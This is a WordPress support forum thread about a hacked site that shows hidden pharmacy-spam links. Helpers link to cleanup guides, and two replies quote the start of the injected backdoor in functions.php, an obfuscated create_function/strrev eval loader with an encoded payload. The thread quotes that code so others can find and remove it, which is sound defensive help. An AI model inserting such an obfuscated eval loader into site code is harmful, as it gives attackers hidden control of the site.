Title: Quick Fix Help
Last modified: August 21, 2016

---

# Quick Fix Help

 *  [briang123](https://wordpress.org/support/users/briang123/)
 * (@briang123)
 * [12 years, 4 months ago](https://wordpress.org/support/topic/quick-fix-help/)
 * I’ve got a div id <hide> tag on my site that is putting in a bunch of spam and
   links above my posts. It seems it makes itself invisible to a person logged in
   and have used other tools to try and see where the code lays. In need of the 
   pros on here who can take a quick look and possibly tell me where the code is
   hiding so I can attempt to fix it.
 * [http://www.TheHealthyKey.com](http://www.TheHealthyKey.com)
 * – firebug showed div id= <hidemeya> viagra, cialias, levitra quick money loans
   etc, but I could never match it to the header php or any other code editor file.
 * thanks in advance

Viewing 8 replies - 1 through 8 (of 8 total)

 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [12 years, 4 months ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498245)
 * oh dear – that sounds like you’ve been hacked. 🙁
 * You need to start working your way through these resources:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Anything less will probably result in the hacker walking straight back into your
   site again.
 * Additional Resources:
    [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  [Dave Naylor](https://wordpress.org/support/users/wpranger/)
 * (@wpranger)
 * [12 years, 4 months ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498248)
 * I think it’s reasonable to assume that your site has been compromised. It’s time
   to have a careful read through this post:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * _Beaten to it above_
 *  Thread Starter [briang123](https://wordpress.org/support/users/briang123/)
 * (@briang123)
 * [12 years, 4 months ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498303)
 * Well thanks for the responses, was hoping for more than a standard boiler plate
   response as I have see this reply to almost every other question of this nature.
   In my personal case there really doesn’t seem to be a whole lot wrong with my
   site,ie (no redirecting, changes in appearance, etc) just the fact that I have
   this spam at the top of some of my posts. I know people don’t owe me a thing 
   as far as free help on here, just hoping someone could offer a little help based
   on my individual site as opposed to lumping it in with every other hack, spam,
   problem on here.
 * Thanks
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [12 years, 4 months ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498308)
 * > have see this reply to almost every other question of this nature
 * I didn’t realise that we had so many reports of hacked sites here. But the reason
   the same list of links is given is that they represent the best sets of instructions
   for thoroughly de-lousing your site.
 *  Thread Starter [briang123](https://wordpress.org/support/users/briang123/)
 * (@briang123)
 * [12 years, 4 months ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498316)
 * I understand that, like I said im not complaining, its just I could go through
   hours and hours of reading and changing and following all those links and then
   find out down the road that it was possibly as simple as X.
 * No worries,
 *  [Average Daily Politician](https://wordpress.org/support/users/average-daily-politician/)
 * (@average-daily-politician)
 * [12 years, 4 months ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498429)
 * And update your passwords immediately. Use stronger passwords. Don’t share them
   with people or save them in browsers.
 * This shows how taking basic security measures can go a long way to saving headaches
   and possibly saving your business.
 *  [kmitz](https://wordpress.org/support/users/kmitz/)
 * (@kmitz)
 * [12 years, 2 months ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498675)
 * Are you running the Genesis theme or sub-theme? Check themes/Genesis/functions.
   php — open in your code editor.
 * I found some code (looked like it was base-64 encoded) inserted before the normal-
   looking code. The fact that it had 2 sets of PHP tags tipped me off.
 * Comment out or remove that first function that starts like this:
 * `$wp_function_initialize = create_function('$a',strrev(';)a$(lave'));`
 * If you don’t have Genesis, check your other themes. I’ve also read online that
   the code is sometimes in the header.php file, but not in my case.
 *  [gowrir1](https://wordpress.org/support/users/gowrir1/)
 * (@gowrir1)
 * [12 years, 1 month ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498678)
 * I had similar code as kmitz pointed out in my functions.php at the very top.
 * It looked like this:
 * <?php $wp_function_initialize = create_function(‘$a’,strrev(‘;)a$(lave’)); $wp_function_initialize(
   strrev(‘;))”==gC7kiIwhGcf52 (some gibberish code) ?>
 * I removed the whole code block from <?php to ?>, that fixed my problem.
 * In case you are curious to decode any of the encrypted code, you can go to [http://sucuri.net/](http://sucuri.net/)
   and get it decoded. In my case when I decoded I saw this code:
 * [http://ddecode.com/phpdecoder/?results=d08102e24b67416ef67bc29b56d08a31](http://ddecode.com/phpdecoder/?results=d08102e24b67416ef67bc29b56d08a31)
 * Hope this helps.

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘Quick Fix Help’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 8 replies
 * 6 participants
 * Last reply from: [gowrir1](https://wordpress.org/support/users/gowrir1/)
 * Last activity: [12 years, 1 month ago](https://wordpress.org/support/topic/quick-fix-help/#post-4498678)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics